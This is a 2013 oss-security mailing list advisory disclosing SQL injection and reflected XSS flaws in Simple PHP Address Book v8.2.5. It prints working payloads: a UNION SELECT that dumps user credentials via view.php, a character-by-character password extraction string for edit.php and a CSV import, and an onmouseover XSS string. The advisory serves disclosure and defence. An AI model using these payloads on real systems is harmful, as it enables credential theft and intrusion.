Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 17 Apr 2013 11:14:27 +0800
From: Doraemon Sk8ers <doraemon.sk8ers@...il.com>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in PHP Address Book v8.2.5

Hi,

There is a SQL injection vulnerability and reflected XSS in Simple PHP
Address Book v8.2.5.
The 2 vulnerabilities had been assigned the CVE identifier CVE-2013-1748
(SQLi) & CVE-2013-1749 (XSS) respectively.

# Software Link: http://sourceforge.net/projects/php-addressbook/
# Version: v8.2.5
# Tested on: v8.2.5
# CVE : CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS)


Details:
-----------
*
*
*CVE-2013-1748 (SQLi)*

We have discovered 3 pages which are prone to SQL Injection

1.	/view.php?id=1
The "id" parameter is vulnerable to SQL injection
Injection Vector:
	/view.php?id=-1' union select '1','2','3','4',(select username from
users limit 1),(select md5_pass from users limit 1),(select email from
users limit 1),'8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41
This injection vector will dump the username, md5 password and email
of the first user in the user table onto the page itself

2.	/edit.php
Most of the fields on this page are vulnerable to SQL injection
Injection Vector (inclusive of quotes):
	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
This will dump out the ASCII value of the 1st character of the md5
password of the first user

3.	/import.php
The same injection vulnerability as Point 2 above is also present in
the import function
Using the same injection vector, saved in a csv file
	'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'
Similarly, this injection vector will dump out the ASCII value of the
1st character of the md5 password of the first user

The original input csv sample looks like this
"Last name";"First
name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
"thelastname";"thefirstname";"13.09.1951";"Street";"1234";"city,
Country";"+1 123 456 789";"+2 345 678 910";"first.last@...l1.com";"+3
456 789 101";"+4 567 897 011";"first.last@...l2.net";"second street,
1234 secondcity, secondcountry";"+5 678 910 111"

The injected csv with the injected vectors looks like this
"Last name";"First
name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail
home";"Work";"Fax";"E-mail office";"Second address";"Second phone"
"";"injectedthrucsv";"13.09.1951";"'+(select ASCII(SUBSTRING((SELECT
md5_pass from users limit 1), 1)))+'";"";"city, Country";"+1 123 456
789";"+2 345 678 910";"first.last@...l1.com";"+3 456 789 101";"+4 567
897 011";"first.last@...l2.net";"second street, 1234 secondcity,
secondcountry";"+5 678 910 111"



*CVE-2013-1749 (XSS)*

For the reflected XSS, we have identified the bug on edit.php

1.	/edit.php
Enter "onmouseover="alert(document.domain);" inclusive of the quotes
into the "Address" field and click next
On the next page, mouse over the First Name field to trigger the XSS

*
*

Timeline:
-------------

15 Feb 2013: Emailed vendor on bugs found

21 Feb 2013: Emailed vendor again

14 Mar 2013: No response from vendor

17 April 2013: Advisory posted (No response from Vendor, published)


Regards


Team Doraemon.Sk8ers

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ